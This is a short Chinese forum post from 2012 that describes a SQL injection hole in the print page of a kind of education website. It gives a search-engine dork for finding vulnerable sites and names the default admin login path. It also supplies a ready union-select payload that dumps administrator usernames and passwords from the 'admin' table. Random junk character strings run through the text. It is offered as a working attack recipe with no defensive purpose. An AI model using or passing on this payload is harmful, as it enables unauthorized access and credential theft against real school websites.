教育站打印页面漏洞
/ }) s4 b' @- D8 f6 g$ q" b百度或google搜索 inurl:info_Print.asp?ArticleID=% t( f# H" Q+ h6 s1 ~ {, H
默认后台:/ad_login.asp
$ v" K: |4 q! y, W7 T1 s. U3 ]1 Z爆管理员密码:0 @. u4 u& ^: a! w5 j. Y9 }- a _3 w
在 域名/inurl:info_Print.asp?ArticleID=数字 后边加空格,然后加下边的红色语句,回车即可: O1 ]# t& G, C$ j
3 v8 T( v: N7 S# ]) G" N
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin1 L0 i3 a& r* R( U7 c) n
1 w6 z" M% g& f- V
作者:佚名
! \# y2 c" B1 P- V6 u 0 Q8 c/ P+ R4 @7 n9 K
/ {5 o( H& L* \1 a3 V: d |
发表于 2012-10-31 08:37:31
收藏
支持
反对